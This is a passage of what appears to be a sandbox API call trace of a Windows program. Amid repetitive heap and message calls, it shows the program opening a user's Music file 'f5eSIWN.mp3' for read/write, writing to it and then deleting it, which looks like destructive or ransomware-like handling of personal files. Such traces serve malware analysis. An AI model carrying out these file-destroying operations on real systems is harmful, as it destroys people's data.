hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.916] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0037.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.916] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.917] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.917] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0037.917] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.917] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f5esiwn.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0037.917] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.917] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.918] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.918] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.918] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.918] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.918] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.918] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.918] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.919] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.919] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.919] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.919] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.920] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.920] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.920] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.920] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.920] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.920] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0037.920] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.920] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.920] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.921] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.921] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", lpFilePart=0x0) returned 0x2f [0037.921] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.921] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59695b30, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0x9c1fc00, ftLastAccessTime.dwHighDateTime=0x1d5b6c8, ftLastWriteTime.dwLowDateTime=0x164fb320, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xec0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="f5eSIWN.mp3", cAlternateFileName="")) returned 0x7c2100 [0037.921] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\f5esiwn.mp3")) returned 1 [0037.922] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59695b30, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0x9c1fc00, ftLastAccessTime.dwHighDateTime=0x1d5b6c8, ftLastWriteTime.dwLowDateTime=0x164fb320, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xec0, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="f5eSIWN.mp3", cAlternateFileName="")) returned 0 [0037.922] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0037.922] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0037.922] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.923] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.923] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0037.923] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 